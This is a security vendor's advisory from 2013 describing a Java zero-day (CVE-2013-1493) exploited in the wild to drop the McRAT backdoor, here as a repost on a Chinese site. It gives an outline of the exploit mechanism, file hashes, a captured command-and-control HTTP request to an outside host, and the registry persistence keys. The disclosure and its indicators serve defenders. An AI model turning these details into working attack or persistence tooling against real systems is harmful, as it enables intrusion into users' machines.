Author: Darien Kindlund & Yichong Lin, February 28, 2013
Through our Malware Protection Cloud (MPC), we detected a brand new Java zero-day vulnerability that was used to attack multiple customers. Specifically, we observed successful exploitation against browsers that have Java v1.6 Update 41 and Java v1.7 Update 15 installed.
Not like other popular Java vulnerabilities in which security manager can be disabled easily, this vulnerability leads to arbitrary memory read and write in JVM process. After triggering the vulnerability, exploit is looking for the memory which holds JVM internal data structure like if security manager is enabled or not, and then overwrites the chunk of memory as zero. Upon successful exploitation, it will download a McRAT executable (MD5: b6c8ede9e2153f2a1e650dfa05b59b99 as svchost.jpg) from same server hosting the JAR file and then execute it.
Figure 1. Example HTTP GET of the McRAT after the browser is successfully exploited, prior to the endpoint becoming fully compromised.
The exploit is not very reliable, as it tries to overwrite a big chunk of memory. As a result, in most cases, upon exploitation, we can still see the payload downloading, but it fails to execute and yields a JVM crash. When the McRAT successfully installs in the compromised endpoint as an EXE (MD5: 4d519bf53a8217adc4c15d15f0815993), it generates the following HTTP command and control traffic:
POST /59788582 HTTP/1.0 Content-Length: 44 Accept: text/html,application/xhtml+xml,application/xml,*/* User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: 110.XXX.55.187 Pragma: no-cache
4PdWXOD3Vlzg91Zc4PdWXOD3Vlzg91Zc4PdWXMP1RXw.
McRAT persists by writing a copy of itself as a DLL to (C:Documents and SettingsadminAppMgmt.dll) and performing the following registry modifications:
REGISTRYMACHINESYSTEMControlSet001ServicesAppMgmtParameters"ServiceDll" = C:Documents and SettingsadminAppMgmt.dll REGISTRYMACHINESYSTEMControlSet001ServicesAppMgmtParameters"ServiceDll" = %SystemRoot%System32appmgmts.dll
This post was intended to serve as a warning to the general public. We have notified Oracle and will continue to work with Oracle on this in-the-wild discovery. Since this exploit affects the latest Java 6u41 and Java 7u15 versions, we urge users to disable Java in your browser until a patch has been released; alternatively, set your Java security settings to "High" and do not
execute any unknown Java applets outside of your organization.
We will continue to update this blog as new information about this threat is found. FireEye would like to acknowledge and thank Hermes Bojaxhi and his team at CyberESI for their assistance in confirming this Java zero-day vulnerability.
This blog was written by FireEye researchers Darien Kindlund and Yichong Lin.
Update: Oracle assigned CVE-2013-1493 on this vulnerability.
from: http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/yaj0-yet-another-java-zero-day-2.html
文章来源于lcx.cc:YAJ0: Yet Another Java Zero-Day
昨晚的文章发出后,陆续又收到了一些很好的建议,所以把签名再改了改,今天用的是新签名。 又到周末了,回答几个积累下来的读者提问吧。 问:道哥,求解答一个问题,想到现在还是睡不着。我有一个朋友,半年前他在社会上玩,我也有半年没跟他来往了,今天突然来找我。表…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论